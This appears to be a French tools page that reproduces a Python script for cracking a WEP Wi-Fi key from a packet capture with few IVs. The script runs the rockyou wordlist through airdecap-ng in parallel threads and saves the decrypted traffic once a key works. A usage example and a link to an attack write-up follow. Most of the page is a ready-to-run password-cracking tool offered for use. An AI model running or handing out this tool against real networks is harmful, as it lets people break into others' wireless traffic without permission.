Aller au contenu

Outils

Cracker un mot de passe wep avec un nombre d'IV peu important.

https://gist.github.com/tbhaxor/170894df0d43fd23eae49b0b20442c27

Script

Python 3
import re
import sys
import subprocess
import os
import uuid
from binascii import hexlify
from concurrent.futures import ThreadPoolExecutor

# check the required parameters in the argv list
if len(sys.argv) < 4:
    print("usage: %s <password file> <capture file> <bssid>" % sys.argv[0], file=sys.stderr)
    sys.exit(1)

def do_crack(ascii: bytes, key: bytes, pool: ThreadPoolExecutor):
    sys.stdout.write("\033[K")
    print("[!] Trying key", ascii.decode(), end="\r")

    # generate output file name
    outfile = uuid.uuid1().hex + ".cap"

    # call the airdecap with key, bssid, output file and capture file (params in order)
    output = subprocess.check_output(["/usr/bin/airdecap-ng", 
                                        "-w", key, 
                                        "-b", sys.argv[3], 
                                        "-o", outfile,
                                        sys.argv[2]], 
                                    stderr=subprocess.DEVNULL)

    # transform the output in the list
    output_decoded = output.decode()
    output_list = output_decoded.strip().split("\n")

    # iterate list to check for "decrypted WEP" string in it
    for entry in output_list:
        if entry.count("decrypted WEP") > 0:
            # check the last word, if it is not equal to 0, thefore key crack is successful
            # print the key and the decrypted file name
            # shutdown the thread pool and cancel futures
            # exit the main process with exit code 0
            words = entry.split(" ")
            if int(words[-1]) != 0:
                sys.stdout.write("\033[K")
                print("\r[!] Found: ", ascii.decode())
                print("[!] Decrypted file: ", outfile)
                pool.shutdown(wait=False, cancel_futures=True)
                sys.exit(0)
            else:
                # unlink the file failed to decrypt
                os.unlink(outfile)

    pass


# handle RuntimeError error for unexpected pool shutdown
# handle all other errors in second expect block
try:
    # create the thread pool executor with max 5 workers (you can increase it too)
    # open the file in read-binary format from first argument
    with ThreadPoolExecutor(max_workers=5) as pool, open(sys.argv[1], "rb") as file:
        for line in file:
            # remove the whitespaces like \r or \n or both
            line = line.strip()

            # if the key is 40 bits or 104 bits submit to do_crack function after
            # converting the binary string to hex like "echo key | xxd -ps"
            if len(line) == 5 or len(line) == 13:
                key = hexlify(line)
                pool.submit(do_crack, line, key, pool)
except RuntimeError:
    sys.exit(0)
except Exception as e:
    print("Unexpected failure: %s" % e)
    sys.exit(1)

Exemple d'usage

python wep_decrypt.py <wordlist> <pcap_file> <bssid>

En pratique :

python3 wep_decrypt.py /usr/share/wordlists/rockyou.txt file.cap ff:ff:ff:ff:ff:ff

Note

Attention à bien choisir sa liste de mot de passe.

Présentation et explication d'une attaque

https://tbhaxor.com/decrypt-wep-traffic-with-insufficient-ivs/